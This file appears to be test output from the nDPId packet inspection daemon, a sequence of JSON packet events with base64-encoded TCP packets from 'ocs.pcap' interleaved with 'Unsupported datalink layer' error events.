-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":512,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJrQABABoBywKi0ArL40DbC2QBQ64tGkd7uik+wECea69gAAAEBCAoANY+vRwYdKAEBBQre7o+73u6VJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":513,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820137} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":513,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJsQABABoBxwKi0ArL40DbC2QBQ64tGkd7uik+wECea5mkAAAEBCAoANY+yRwYdKAEBBQre7o+73u6akw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":514,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820139} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":514,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJtQABABoBwwKi0ArL40DbC2QBQ64tGkd7uik+wECea4P0AAAEBCAoANY+yRwYdKAEBBQre7o+73u6f\/w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":515,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820169} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":515,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJuQABABoB7wKi0ArL40DbC2QBQ64tGkd7un\/+AECfI7pwAAAEBCAoANY+1RwYdWA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":516,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820170} -00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":516,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJvQABABoBuwKi0ArL40DbC2QBQ64tGkd7un\/+wECfIwBQAAAEBCAoANY+1RwYdWAEBBQre7pqT3u6f\/w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":517,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820172} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":517,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJwQABABoB5wKi0ArL40DbC2QBQ64tGkd7upWuAECf16QMAAAEBCAoANY+1RwYdWA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":518,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820175} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":518,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJxQABABoB4wKi0ArL40DbC2QBQ64tGkd7uqteAECgi42kAAAEBCAoANY+1RwYdWQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":519,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820237} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":519,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJyQABABoB3wKi0ArL40DbC2QBQ64tGkd7usEOAEChP3cIAAAEBCAoANY+8RwYdYA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":520,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652820239} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":520,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJzQABABoBqwKi0ArL40DbC2QBQ64tGkd7usEOwEChPeQIAAAEBCAoANY+8RwYdYAEBBQre7rWv3u67Gw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":521,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823808} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":521,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ0QABABoB1wKi0ArL40DbC2QBQ64tGkd7uuxuAECh9zeAAAAEBCAoANZEgRwYg2A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":522,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823859} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":522,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJ1QABABoBowKi0ArL40DbC2QBQ64tGkd7uuxuwECh9SJIAAAEBCAoANZEmRwYg2AEBBQre7sXz3u7LXw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":523,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823861} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":523,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJ2QABABoBnwKi0ArL40DbC2QBQ64tGkd7uuxuwECh9QyYAAAEBCAoANZEmRwYg2AEBBQre7sXz3u7Qyw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":524,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823933} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":524,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMJ3QABABoBmwKi0ArL40DbC2QBQ64tGkd7uwIewECiqPWMAAAEBCAoANZEtRwYg+wEBBQre7sXz3u7Qyw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":525,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823934} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":525,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ4QABABoBxwKi0ArL40DbC2QBQ64tGkd7u0MuAECjXt6YAAAEBCAoANZEtRwYg+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":526,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823936} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":526,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ5QABABoBwwKi0ArL40DbC2QBQ64tGkd7u1jeAECkEsgwAAAEBCAoANZEuRwYg+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":527,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823969} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":527,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ6QABABoBvwKi0ArL40DbC2QBQ64tGkd7u26OAECkyrF0AAAEBCAoANZExRwYhDQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":528,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823970} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":528,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ7QABABoBuwKi0ArL40DbC2QBQ64tGkd7u4Q+AEClfpsQAAAEBCAoANZExRwYhDQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":529,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652823971} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":529,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ8QABABoBtwKi0ArL40DbC2QBQ64tGkd7u5nuAECmMoSoAAAEBCAoANZExRwYhDg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":530,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824016} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":530,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ9QABABoBswKi0ArL40DbC2QBQ64tGkd7u6+eAECm5m4QAAAEBCAoANZE2RwYhFg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":531,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824017} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":531,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ+QABABoBrwKi0ArL40DbC2QBQ64tGkd7u8VOAECnnleoAAAEBCAoANZE2RwYhFg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":532,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824018} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":532,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMJ\/QABABoBqwKi0ArL40DbC2QBQ64tGkd7u9r+AECoUkFAAAAEBCAoANZE2RwYhFw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":533,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824052} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":533,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKAQABABoBpwKi0ArL40DbC2QBQ64tGkd7u\/CuAECpBiqkAAAEBCAoANZE5RwYhIg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":534,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824052} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":534,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKBQABABoBowKi0ArL40DbC2QBQ64tGkd7vAZeAECpuhRAAAAEBCAoANZE5RwYhIg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":535,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824054} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":535,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKCQABABoBnwKi0ArL40DbC2QBQ64tGkd7vBwOAECqcf3YAAAEBCAoANZE5RwYhIg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":536,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824055} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":536,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKDQABABoBmwKi0ArL40DbC2QBQ64tGkd7vDG+AECrJedwAAAEBCAoANZE6RwYhIg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":537,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824102} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":537,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKEQABABoBlwKi0ArL40DbC2QBQ64tGkd7vEduAECr2dDYAAAEBCAoANZE+RwYhKw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":538,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824103} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":538,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKFQABABoBkwKi0ArL40DbC2QBQ64tGkd7vF0eAECsjbp0AAAEBCAoANZE+RwYhKw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":539,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824103} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":539,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKGQABABoBjwKi0ArL40DbC2QBQ64tGkd7vHLOAECtRaQMAAAEBCAoANZE+RwYhKw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":540,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824107} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":540,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKHQABABoBiwKi0ArL40DbC2QBQ64tGkd7vIh+AECt+Y2kAAAEBCAoANZE\/RwYhKw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":541,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824142} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":541,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKIQABABoBhwKi0ArL40DbC2QBQ64tGkd7vJ4uAECurXcEAAAEBCAoANZFCRwYhNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":542,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824143} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":542,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKJQABABoBgwKi0ArL40DbC2QBQ64tGkd7vLPeAECvYWCgAAAEBCAoANZFCRwYhNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":543,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824143} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":543,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKKQABABoBfwKi0ArL40DbC2QBQ64tGkd7vMmOAECwGUo4AAAEBCAoANZFCRwYhNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":544,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824143} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":544,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKLQABABoBewKi0ArL40DbC2QBQ64tGkd7vN8+AECwzTPUAAAEBCAoANZFCRwYhNw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":545,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824171} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":545,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKMQABABoBdwKi0ArL40DbC2QBQ64tGkd7vPTuAECxgR08AAAEBCAoANZFFRwYhQQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":546,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824173} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":546,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKNQABABoBcwKi0ArL40DbC2QBQ64tGkd7vQqeAECyNQbYAAAEBCAoANZFFRwYhQQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":547,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824174} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":547,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKOQABABoBbwKi0ArL40DbC2QBQ64tGkd7vSBOAECy7PBwAAAEBCAoANZFFRwYhQQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":548,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824175} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":548,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKPQABABoBawKi0ArL40DbC2QBQ64tGkd7vTX+AECzoNoIAAAEBCAoANZFGRwYhQQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":549,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824205} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":549,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKQQABABoBZwKi0ArL40DbC2QBQ64tGkd7vUuuAEC0VMN4AAAEBCAoANZFJRwYhSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":550,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824206} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":550,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKRQABABoBYwKi0ArL40DbC2QBQ64tGkd7vWFeAEC1CK0UAAAEBCAoANZFJRwYhSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":551,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824207} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":551,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKSQABABoBXwKi0ArL40DbC2QBQ64tGkd7vXcOAEC1wJasAAAEBCAoANZFJRwYhSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":552,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824209} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":552,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKTQABABoBWwKi0ArL40DbC2QBQ64tGkd7vYy+AEC2dIBEAAAEBCAoANZFJRwYhSg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":553,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824211} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":553,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKUQABABoBVwKi0ArL40DbC2QBQ64tGkd7vaJuAEC3KGngAAAEBCAoANZFJRwYhSg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":554,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824262} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":554,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKVQABABoBUwKi0ArL40DbC2QBQ64tGkd7vbgeAEC33FNEAAAEBCAoANZFORwYhUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":555,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824262} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":555,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKWQABABoBTwKi0ArL40DbC2QBQ64tGkd7vc3OAEC4lDzcAAAEBCAoANZFORwYhUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":556,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824264} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":556,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKXQABABoBSwKi0ArL40DbC2QBQ64tGkd7veN+AEC5SCZ4AAAEBCAoANZFORwYhUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":557,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824265} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":557,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKYQABABoBRwKi0ArL40DbC2QBQ64tGkd7vfkuAEC5\/BAQAAAEBCAoANZFPRwYhUw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":558,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824266} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":558,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKZQABABoBQwKi0ArL40DbC2QBQ64tGkd7vg7eAEC6s\/mkAAAEBCAoANZFPRwYhVA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":559,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824271} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":559,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMKaQABABoBPwKi0ArL40DbC2QBQ64tGkd7viSOAEC7a+M8AAAEBCAoANZFPRwYhVA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":560,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824323} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":560,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMKbQABABoBCwKi0ArL40DbC2QBQ64tGkd7viSOwEC7a4kgAAAEBCAoANZFURwYhVAEBBQre746P3u+T+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":561,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652824325} 